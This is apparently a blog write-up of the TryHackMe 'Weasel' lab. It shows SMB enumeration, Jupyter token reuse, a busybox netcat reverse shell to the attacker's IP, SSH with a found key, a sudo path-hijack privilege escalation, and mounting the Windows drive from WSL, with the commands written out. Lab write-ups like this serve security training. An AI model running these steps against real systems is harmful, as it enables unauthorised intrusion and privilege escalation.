➜ ~

Playing Hacks and Stuffs!

Project maintained by h4ckyou Hosted on GitHub Pages — Theme by mattgraham

Weasel TryHackMe

image

Nmap Scan: image

From the scan we can tell that this is a windows box

Let’s enumerate smb first

Checking the shares available shows this image

Now we can mount the datasci-team share image

Command: sudo mount -t cifs -o username=guest,password= //10.10.195.131/datasci-team mount

After i looked through the smb folders in that share i didn’t see anything interesting except this jupyter token image

We can now unmount it image

Command: sudo umount mount

Back to the port 8888 shows this image

This is an instance of jupyter and it’s running on port 8888

It requies a token to get logged in

Remember we got a token from the smb so using it here works image

Token: 067470c5ddsadc54153ghfjd817d15b5d5f5341e56b0dsad78a

To get shell on jupyter is very easy since it usually have a python interactive instance and also a terminal

But let’s go with the terminal option

Click on the new button then click the terminal button image image

I just got a reverse shell using busybox binary image image

Command: busybox nc 10.2.42.156 1337 -e /bin/bash

From here we see that this is a linux host

But our nmap scan showed that this is a windows box

So the only thing we can think of is that this is a host running wsl

Looking at the current working directory we can see a ssh key for user dev-datasci-lowpriv image

We can try login to ssh cause it works image

Command:-
chmod 600 id_rsa
ssh -i id_rsa dev-datasci-lowpriv@10.10.195.131

Let’s see if we can root the wsl host because if that works we can just mount the windows host and access the administrator directory

Also i’m taking this path cause i suck at privesc in windows 😄

Checking sudo permission on the wsl shows this image

Interesting we can run /home/dev-datasci/.local/bin/jupyter as root that looks too easy already 🙂

But trying it doesn’t work image

We get command not found and that is because the binary isn’t in that specific path smh

I used find command then got the binary image

Command: find / -type f -name jupyter 2>/dev/null

Now we can just copy the binary to that path since we have write access cause /home/dev-datasci/.local is owned by us image

Command: cp /home/dev-datasci/anaconda3/bin/jupyter /home/dev-datasci/.local/bin/jupyter

Running sudo on it now works cool image

Command: sudo /home/dev-datasci/.local/bin/jupyter --help

From here we can start a new lab jupyter instance and access it to get a new terminal running as root

Here’s the docs that helped me out

But i got this error image

We can add the –allow-root to bypass that message

Doing that now works image

Command:sudo /home/dev-datasci/.local/bin/jupyter notebook --ip 10.10.195.131 --port 8089 --allow-root

It created this new link with the token as it’s GET parameter http://10.10.195.131:8089/?token=20c98ba247520987b457638652bc252a9f55c74fe42375ba

I logged out of that jupyter instance and logged in with the new token image

Following the previous way we used to get shell works also image image

But remember we are just root on this wsl but this gives us the permission to access the *C:* drive on the windows thos

We can now just mount it

Here’s the resource that helped me out

Mounting it works and we can grab the root flag image

Command:-
mkdir /mnt/windows
mount -t drvfs C: /mnt/windows

The flag is saying something about elevated privesc THM{evelated_w3as3l_l0ngest_boi} maybe intended was by getting root from the main host via elevated privilege escalation idk 🤔

And we’re done 👻